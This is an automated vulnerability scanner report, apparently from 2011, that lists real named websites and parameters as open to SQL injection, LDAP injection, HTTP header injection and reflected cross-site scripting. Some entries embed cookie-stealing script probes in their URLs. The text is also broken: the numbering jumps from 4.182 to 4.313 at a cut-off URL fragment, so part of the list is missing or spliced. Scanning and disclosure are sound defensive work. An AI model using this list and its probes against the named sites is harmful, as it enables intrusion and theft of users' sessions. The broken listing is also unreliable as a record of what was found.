Please be advised that this file is 12Mb and may take a moment to load.. but its filled with Proof of Concept Vulnerability Execution Reports...

SQLi, HTTPi, XSS, Report, DORK, Search

Vulnerable Host Report | CloudScan Vulnerability Crawler

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 12:47:29 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://googleads.g.doubleclick.net/pagead/ads [fu parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

1.3. http://latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [name of an arbitrarily supplied request parameter]

1.4. http://mm.chitika.net/minimall [cb parameter]

1.5. http://mm.chitika.net/minimall [cl_site_link parameter]

1.6. http://mm.chitika.net/minimall [frm parameter]

1.7. http://mm.chitika.net/minimall [output parameter]

1.8. http://pubads.g.doubleclick.net/gampad/ads [flash parameter]

1.9. [User-Agent HTTP header]

1.10. http://www.baysideeyes.com.au/aboutus.htm [REST URL parameter 1]

1.11. http://www.baysideeyes.com.au/aboutus.htm [name of an arbitrarily supplied request parameter]

1.12. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 1]

1.13. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 2]

1.14. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 3]

1.15. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [name of an arbitrarily supplied request parameter]

1.16. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 1]

1.17. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 2]

1.18. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 3]

1.19. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [name of an arbitrarily supplied request parameter]

1.20. http://www.baysideeyes.com.au/favicon.ico [REST URL parameter 1]

1.21. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]

1.22. http://www.baysideeyes.com.au/referrer-information.htm [REST URL parameter 1]

1.23. http://www.baysideeyes.com.au/referrer-information.htm [name of an arbitrarily supplied request parameter]

1.24. http://www.baysideeyes.com.au/sitemap.htm [REST URL parameter 1]

1.25. http://www.baysideeyes.com.au/sitemap.htm [name of an arbitrarily supplied request parameter]

1.26. http://www.facebook.com/search/ [name of an arbitrarily supplied request parameter]

1.27. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 1]

1.28. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 2]

1.29. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 3]

1.30. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [name of an arbitrarily supplied request parameter]

1.31. http://www.linkatopia.com/ [Referer HTTP header]

1.32. http://www.linkatopia.com/ [User-Agent HTTP header]

1.33. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]

1.34. http://www.linkfixerplus.com/ [name of an arbitrarily supplied request parameter]

1.35. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 1]

1.36. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 2]

1.37. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 1]

1.38. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 2]

1.39. http://www.linuxsecurity.com/advisories/ [473097ac08cef5345a0ef7ef35a119cd cookie]

1.40. http://www.linuxsecurity.com/advisories/ [Referer HTTP header]

1.41. http://www.linuxsecurity.com/advisories/ [User-Agent HTTP header]

1.42. http://www.linuxsecurity.com/advisories/ [__utma cookie]

1.43. http://www.linuxsecurity.com/advisories/ [__utmb cookie]

1.44. http://www.linuxsecurity.com/advisories/ [__utmc cookie]

1.45. http://www.linuxsecurity.com/advisories/ [__utmz cookie]

1.46. http://www.linuxsecurity.com/advisories/ [name of an arbitrarily supplied request parameter]

1.47. http://www.slackbooks.com/Athletic+Training [REST URL parameter 1]

1.48. http://www.slackbooks.com/Manual+Therapy [REST URL parameter 1]

1.49. http://www.slackbooks.com/Orthotics+and+Prosthetics [REST URL parameter 1]

1.50. http://www.slackbooks.com/Physical+Therapy [REST URL parameter 1]

1.51. http://www.slackbooks.com/aclreconstuct [REST URL parameter 1]

1.52. http://www.slackbooks.com/aclreconstuct [name of an arbitrarily supplied request parameter]

1.53. http://www.slackbooks.com/ccacl [REST URL parameter 1]

1.54. http://www.slackbooks.com/ccacl [name of an arbitrarily supplied request parameter]

1.55. http://www.slackbooks.com/ccknee [REST URL parameter 1]

1.56. http://www.slackbooks.com/ccknee [name of an arbitrarily supplied request parameter]

1.57. http://www.slackbooks.com/clinical+nursing+resources [REST URL parameter 1]

1.58. http://www.slackbooks.com/essentialknee [REST URL parameter 1]

1.59. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]

1.60. http://www.slackbooks.com/gastroenterology [REST URL parameter 1]

1.61. http://www.slackbooks.com/homemodification [REST URL parameter 1]

1.62. http://www.slackbooks.com/homemodification [name of an arbitrarily supplied request parameter]

1.63. http://www.slackbooks.com/occupational+therapy [REST URL parameter 1]

1.64. http://www.slackbooks.com/ophthalmic+technology [REST URL parameter 1]

1.65. http://www.slackbooks.com/ophthalmology [REST URL parameter 1]

1.66. http://www.slackbooks.com/orthopedics [REST URL parameter 1]

1.67. http://www.slackbooks.com/pediatrics [REST URL parameter 1]

2. LDAP injection

2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

2.2. http://www.youtube.com/v/VUCJyeb_3Mo [VISITOR_INFO1_LIVE cookie]

2.3. http://www.youtube.com/v/sj4BVK0o-7w [VISITOR_INFO1_LIVE cookie]

3. HTTP header injection

3.1. http://ad.doubleclick.net/ad/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]

3.2. http://ad.doubleclick.net/ad/N815.286991.WEBBUYERSGUIDE/B5173264 [REST URL parameter 1]

3.3. http://ad.doubleclick.net/ad/N815.zdenterprise/B4597436.59 [REST URL parameter 1]

3.4. http://ad.doubleclick.net/ad/N815.zdenterprise/B4822628.25 [REST URL parameter 1]

3.5. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.14 [REST URL parameter 1]

3.6. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.30 [REST URL parameter 1]

3.7. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.9 [REST URL parameter 1]

3.8. http://ad.doubleclick.net/ad/entzd.eweek/ibmtutorial [REST URL parameter 1]

3.9. http://ad.doubleclick.net/ad/entzd.eweek/ibmwidget/cloudimu [REST URL parameter 1]

3.10. http://ad.doubleclick.net/ad/entzd.eweek/ibmwidget/virtimu [REST URL parameter 1]

3.11. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]

3.12. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]

3.13. http://ad.doubleclick.net/adj/entzd.base/itmanagement [REST URL parameter 1]

3.14. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [REST URL parameter 1]

3.15. http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]

3.16. http://ad.zanox.com/tpv/ [14786739C435671106&ULP parameter]

3.17. http://ad.zanox.com/tpv/ [name of an arbitrarily supplied request parameter]

3.18. http://ad.zanox.com/tpv/ [zpar0 parameter]

3.19. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

3.20. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

3.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

3.22. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.23. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.26. http://live.activeconversion.com/webtracker/track2.html [avc parameter]

3.27. http://mm.chitika.net/track [target parameter]

3.28. http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

3.29. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

4. Cross-site scripting (reflected)

4.1. http://a.ligatus.com/timeout.php [ids parameter]

4.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]

4.3. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [adurl parameter]

4.4. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [adurl parameter]

4.5. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [ai parameter]

4.6. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [ai parameter]

4.7. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [client parameter]

4.8. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [client parameter]

4.9. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [num parameter]

4.10. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [num parameter]

4.11. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sig parameter]

4.12. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sig parameter]

4.13. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sz parameter]

4.14. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sz parameter]

4.15. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [mfg parameter]

4.16. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [name of an arbitrarily supplied request parameter]

4.17. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [tile parameter]

4.18. http://appcdn.wibiya.com/Handlers/newsticker.php [callback parameter]

4.19. http://ar.voicefive.com/b/rc.pli [func parameter]

4.20. http://baselinemag.us.intellitxt.com/al.asp [jscallback parameter]

4.21. http://baselinemag.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.22. http://baselinemag.us.intellitxt.com/v4/init [jscallback parameter]

4.23. http://baselinemag.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.24. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [btid parameter]

4.25. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [ei parameter]

4.26. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [rtbhost parameter]

4.27. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [wp_exchange parameter]

4.28. http://connect.in.com/kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html [REST URL parameter 1]

4.29. http://connect.in.com/kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html [REST URL parameter 1]

4.30. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

4.31. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

4.32. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

4.33. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

4.34. http://digg.com/submit [REST URL parameter 1]

4.35. http://download32.us.intellitxt.com/al.asp [jscallback parameter]

4.36. http://download32.us.intellitxt.com/iframescript.jsp [src parameter]

4.37. http://download32.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.38. http://download32.us.intellitxt.com/v4/advert [jscallback parameter]

4.39. http://download32.us.intellitxt.com/v4/context [jscallback parameter]

4.40. http://download32.us.intellitxt.com/v4/init [jscallback parameter]

4.41. http://download32.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.42. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [REST URL parameter 1]

4.43. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [REST URL parameter 1]

4.44. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [name of an arbitrarily supplied request parameter]

4.45. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [name of an arbitrarily supplied request parameter]

4.46. http://ds.addthis.com/red/psi/sites/www.klivio.com/p.json [callback parameter]

4.47. http://ecal.forexpros.com/e_cal.php [bg1 parameter]

4.48. http://ecal.forexpros.com/e_cal.php [bg2 parameter]

4.49. http://ecal.forexpros.com/e_cal.php [border parameter]

4.50. http://ecal.forexpros.com/e_cal.php [header_bg parameter]

4.51. http://ecal.forexpros.com/e_cal.php [header_text_color parameter]

4.52. http://ecal.forexpros.com/e_cal.php [name of an arbitrarily supplied request parameter]

4.53. http://ecal.forexpros.com/e_cal.php [top_bg parameter]

4.54. http://ecal.forexpros.com/e_cal.php [top_text_color parameter]

4.55. http://flowplayer.org/tools/overlay.html [REST URL parameter 1]

4.56. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem [REST URL parameter 5]

4.57. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem [REST URL parameter 7]

4.58. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ [REST URL parameter 5]

4.59. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ [REST URL parameter 7]

4.60. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/ [REST URL parameter 7]

4.61. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ [REST URL parameter 5]

4.62. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ [REST URL parameter 7]

4.63. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/ [REST URL parameter 5]

4.64. http://img.mediaplex.com/content/0/14302/119028/OI_revised_60days_baker_160x600.js [mpck parameter]

4.65. http://img.mediaplex.com/content/0/14302/119028/OI_revised_60days_baker_160x600.js [mpjs parameter]

4.66. http://img.mediaplex.com/content/0/14302/119028/OI_revised_60days_baker_160x600.js [mpvc parameter]

4.67. http://img.mediaplex.com/content/0/14302/119028/OI_revised_60days_baker_160x600.js [placementid parameter]

4.68. http://info.bisk.com/MCIndex.asp [name of an arbitrarily supplied request parameter]

4.69. http://jlinks.industrybrains.com/jsct [ct parameter]

4.70. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

4.71. http://jlinks.industrybrains.com/jsct [tr parameter]

4.72. http://jqueryui.com/themeroller/ [bgColorActive parameter]

4.73. http://jqueryui.com/themeroller/ [bgColorContent parameter]

4.74. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

4.75. http://jqueryui.com/themeroller/ [bgColorError parameter]

4.76. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

4.77. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

4.78. http://jqueryui.com/themeroller/ [bgColorHover parameter]

4.79. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

4.80. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

4.81. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

4.82. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

4.83. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

4.84. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

4.85. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

4.86. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

4.87. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

4.88. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

4.89. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

4.90. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

4.91. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

4.92. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

4.93. http://jqueryui.com/themeroller/ [bgTextureError parameter]

4.94. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

4.95. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

4.96. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

4.97. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

4.98. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

4.99. http://jqueryui.com/themeroller/ [borderColorActive parameter]

4.100. http://jqueryui.com/themeroller/ [borderColorContent parameter]

4.101. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

4.102. http://jqueryui.com/themeroller/ [borderColorError parameter]

4.103. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

4.104. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

4.105. http://jqueryui.com/themeroller/ [borderColorHover parameter]

4.106. http://jqueryui.com/themeroller/ [cornerRadius parameter]

4.107. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

4.108. http://jqueryui.com/themeroller/ [fcActive parameter]

4.109. http://jqueryui.com/themeroller/ [fcContent parameter]

4.110. http://jqueryui.com/themeroller/ [fcDefault parameter]

4.111. http://jqueryui.com/themeroller/ [fcError parameter]

4.112. http://jqueryui.com/themeroller/ [fcHeader parameter]

4.113. http://jqueryui.com/themeroller/ [fcHighlight parameter]

4.114. http://jqueryui.com/themeroller/ [fcHover parameter]

4.115. http://jqueryui.com/themeroller/ [ffDefault parameter]

4.116. http://jqueryui.com/themeroller/ [fsDefault parameter]

4.117. http://jqueryui.com/themeroller/ [fwDefault parameter]

4.118. http://jqueryui.com/themeroller/ [iconColorActive parameter]

4.119. http://jqueryui.com/themeroller/ [iconColorContent parameter]

4.120. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

4.121. http://jqueryui.com/themeroller/ [iconColorError parameter]

4.122. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

4.123. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

4.124. http://jqueryui.com/themeroller/ [iconColorHover parameter]

4.125. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

4.126. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

4.127. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

4.128. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

4.129. http://jqueryui.com/themeroller/ [opacityShadow parameter]

4.130. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

4.131. http://lovely-faces.com/index.php [v_sex parameter]

4.132. http://lovely-faces.com/index.php [v_sex parameter]

4.133. http://manual.ariens.com/aowners [REST URL parameter 1]

4.134. http://manual.ariens.com/favicon.ico [REST URL parameter 1]

4.135. http://mittelstandsblog.de.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.136. http://mittelstandsblog.de.intellitxt.com/v4/context [jscallback parameter]

4.137. http://mm.chitika.net/minimall [callback parameter]

4.138. http://mm.chitika.net/minimall [output parameter]

4.139. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

4.140. http://px.owneriq.net/anst/s/oiqrmb.js [REST URL parameter 3]

4.141. http://px.owneriq.net/j/ [pt parameter]

4.142. http://quotes.forexyard.com/iframe5.php [css parameter]

4.143. http://quotes.forexyard.com/iframe5.php [img_prefix parameter]

4.144. http://quotes.forexyard.com/iframe5.php [img_prefix parameter]

4.145. http://quotes.forexyard.com/iframe5.php [name of an arbitrarily supplied request parameter]

4.146. http://quotes.forexyard.com/iframe5.php [name of an arbitrarily supplied request parameter]

4.147. http://quotes.forexyard.com/iframe5.php [pairs parameter]

4.148. http://quotes.forexyard.com/iframe5.php [pairs parameter]

4.149. http://quotes.forexyard.com/iframe5.php [zone_id parameter]

4.150. http://quotes.forexyard.com/iframe5.php [zone_id parameter]

4.151. http://router.infolinks.com/gsd/1296944121644.0 [callback parameter]

4.152. http://router.infolinks.com/gsd/1296944132032.0 [callback parameter]

4.153. http://router.infolinks.com/gsd/1296944168552.0 [callback parameter]

4.154. http://rt32.infolinks.com/action/doq.htm [fuid parameter]

4.155. http://rt32.infolinks.com/action/doq.htm [rid parameter]

4.156. http://rt82.infolinks.com/action/doq.htm [fuid parameter]

4.157. http://rt82.infolinks.com/action/doq.htm [rid parameter]

4.158. http://rt83.infolinks.com/action/doq.htm [fuid parameter]

4.159. http://rt83.infolinks.com/action/doq.htm [rid parameter]

4.160. https://splunk.webex.com/mw0305l/mywebex/default.do [REST URL parameter 1]

4.161. https://splunk.webex.com/mw0305l/mywebex/default.do [REST URL parameter 2]

4.162. http://splunkbase.splunk.com/ [1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc parameter]

4.163. http://splunkbase.splunk.com/ [name of an arbitrarily supplied request parameter]

4.164. http://splunkbase.splunk.com/account:session/ [REST URL parameter 1]

4.165. http://splunkbase.splunk.com/account:session/ [redir parameter]

4.166. http://splunkbase.splunk.com/apps/All/4.x/ [REST URL parameter 1]

4.167. http://splunkbase.splunk.com/apps/All/4.x/ [REST URL parameter 2]

4.168. http://splunkbase.splunk.com/apps/All/4.x/ [REST URL parameter 3]

4.169. http://splunkbase.splunk.com/apps/All/4.x/ [name of an arbitrarily supplied request parameter]

4.170. http://splunkbase.splunk.com/apps/All/4.x/ [sort parameter]

4.171. http://splunkbase.splunk.com/static/css/splunk_shared.css [REST URL parameter 1]

4.172. http://splunkbase.splunk.com/static/css/splunk_shared.css [REST URL parameter 2]

4.173. http://splunkbase.splunk.com/static/css/splunk_shared.css [REST URL parameter 3]

4.174. http://splunkbase.splunk.com/static/css/splunkbase.css [REST URL parameter 1]

4.175. http://splunkbase.splunk.com/static/css/splunkbase.css [REST URL parameter 2]

4.176. http://splunkbase.splunk.com/static/css/splunkbase.css [REST URL parameter 3]

4.177. http://splunkbase.splunk.com/static/js/splunkbase.js [REST URL parameter 1]

4.178. http://splunkbase.splunk.com/static/js/splunkbase.js [REST URL parameter 2]

4.179. http://splunkbase.splunk.com/static/js/splunkbase.js [REST URL parameter 3]

4.180. http://tipd.com/ [name of an arbitrarily supplied request parameter]

4.181. http://us.blackberry.com/eng/devices/blackberrytorch.jsp [REST URL parameter 3]

4.182. http://us.blackberry.com/smartphones/94178">aa4542fda85 [REST URL parameter 1]

4.313. http://www.obdev.at/products/littlesnitch/download.html165b9'>aa4542fda85 [REST URL parameter 2]

4.314. http://www.obdev.at/products/littlesnitch/download.html165b9'>aa4542fda85 [REST URL parameter 3]

4.315. http://www.obdev.at/products/littlesnitch/download.html165b9'>aa4542fda85 [REST URL parameter 3]

4.316. http://www.obdev.at/products/littlesnitch/download.html165b9'>aa4542fda85 [REST URL parameter 3]

4.317. http://www.obdev.at/products/littlesnitch/download.html165b9'>aa4542fda85 [REST URL parameter 4]

4.318. http://www.obdev.at/products/littlesnitch/download.html165b9'>aa4542fda85 [REST URL parameter 4]

4.319. http://www.obdev.at/products/littlesnitch/download.html165b9'>aa4542fda85 [REST URL parameter 4]

4.320. http://www.obdev.at/products/littlesnitch/download.html165b9'>aa4542fda85 [name of an arbitrarily supplied request parameter]

4.321. http://www.obdev.at/products/littlesnitch/index.html [REST URL parameter 1]

4.322. http://www.obdev.at/products/littlesnitch/index.html [REST URL parameter 2]

4.323. http://www.obdev.at/products/littlesnitch/index.html [REST URL parameter 3]

4.324. http://www.obdev.at/products/littlesnitch/index.html [name of an arbitrarily supplied request parameter]

4.325. http://www.obdev.at/products/pebbles/index.html [REST URL parameter 1]

4.326. http://www.obdev.at/products/pebbles/index.html [REST URL parameter 2]

4.327. http://www.obdev.at/products/pebbles/index.html [REST URL parameter 3]

4.328. http://www.obdev.at/products/pebbles/index.html [name of an arbitrarily supplied request parameter]

4.329. http://www.obdev.at/products/sharity/index.html [REST URL parameter 1]

4.330. http://www.obdev.at/products/sharity/index.html [REST URL parameter 2]

4.331. http://www.obdev.at/products/sharity/index.html [REST URL parameter 3]

4.332. http://www.obdev.at/products/sharity/index.html [name of an arbitrarily supplied request parameter]

4.333. http://www.obdev.at/products/webyep/index.html [REST URL parameter 1]

4.334. http://www.obdev.at/products/webyep/index.html [REST URL parameter 2]

4.335. http://www.obdev.at/products/webyep/index.html [REST URL parameter 3]

4.336. http://www.obdev.at/products/webyep/index.html [name of an arbitrarily supplied request parameter]

4.337. http://www.obdev.at/shop/index.html [REST URL parameter 1]

4.338. http://www.obdev.at/shop/index.html [REST URL parameter 2]

4.339. http://www.obdev.at/shop/index.html [name of an arbitrarily supplied request parameter]

4.340. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]

4.341. https://www.openforum.com/ [cid parameter]

4.342. https://www.openforum.com/ [inav parameter]

4.343. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]

4.344. http://www.owneriq.com/manuals-online [name of an arbitrarily supplied request parameter]

4.345. http://www.owneriq.com/mostiq [name of an arbitrarily supplied request parameter]

4.346. http://www.peppernews.eu/ [name of an arbitrarily supplied request parameter]

4.347. http://www.pointehilton.com/ [name of an arbitrarily supplied request parameter]

4.348. http://www.pointehilton.com/404.cfm [name of an arbitrarily supplied request parameter]

4.349. http://www.pointehilton.com/awards/index.cfm [name of an arbitrarily supplied request parameter]

4.350. http://www.pointehilton.com/contact/index.cfm [name of an arbitrarily supplied request parameter]

4.351. http://www.pointehilton.com/employment/index.cfm [name of an arbitrarily supplied request parameter]

4.352. http://www.pointehilton.com/favicon.ico [name of an arbitrarily supplied request parameter]

4.353. http://www.pointehilton.com/sitemap/index.cfm [name of an arbitrarily supplied request parameter]

4.354. http://www.pointehilton.com/special-offers/index.cfm [name of an arbitrarily supplied request parameter]

4.355. http://www.protopage.com/ [name of an arbitrarily supplied request parameter]

4.356. http://www.quantcast.com/p-bdv9UMaVrliL2 [REST URL parameter 1]

4.357. http://www.quantcast.com/p-bdv9UMaVrliL2 [REST URL parameter 1]

4.358. http://www.scare666.com/news/gambar [REST URL parameter 2]

4.359. http://www.scare666.com/news/gambar [REST URL parameter 2]

4.360. http://www.shoppinga.de/ [name of an arbitrarily supplied request parameter]

4.361. http://www.slackbooks.com/getthumbnail.ashx [REST URL parameter 1]

4.362. http://www.spiele365.com/ [name of an arbitrarily supplied request parameter]

4.363. http://www.splunk.com/ [name of an arbitrarily supplied request parameter]

4.364. http://www.splunk.com/ [r parameter]

4.365. http://www.splunk.com/base/ [REST URL parameter 1]

4.366. http://www.splunk.com/base/ [REST URL parameter 1]

4.367. http://www.splunk.com/base/ [REST URL parameter 1]

4.368. http://www.splunk.com/base/ [name of an arbitrarily supplied request parameter]

4.369. http://www.splunk.com/base/Documentation [REST URL parameter 1]

4.370. http://www.splunk.com/base/Documentation [REST URL parameter 1]

4.371. http://www.splunk.com/base/Documentation [REST URL parameter 1]

4.372. http://www.splunk.com/base/Documentation [REST URL parameter 2]

4.373. http://www.splunk.com/base/Documentation [REST URL parameter 2]

4.374. http://www.splunk.com/base/Documentation [name of an arbitrarily supplied request parameter]

4.375. http://www.splunk.com/base/Documentation [name of an arbitrarily supplied request parameter]

4.376. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 1]

4.377. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 1]

4.378. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 1]

4.379. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 2]

4.380. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 2]

4.381. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 4]

4.382. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 4]

4.383. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 5]

4.384. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [REST URL parameter 5]

4.385. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [name of an arbitrarily supplied request parameter]

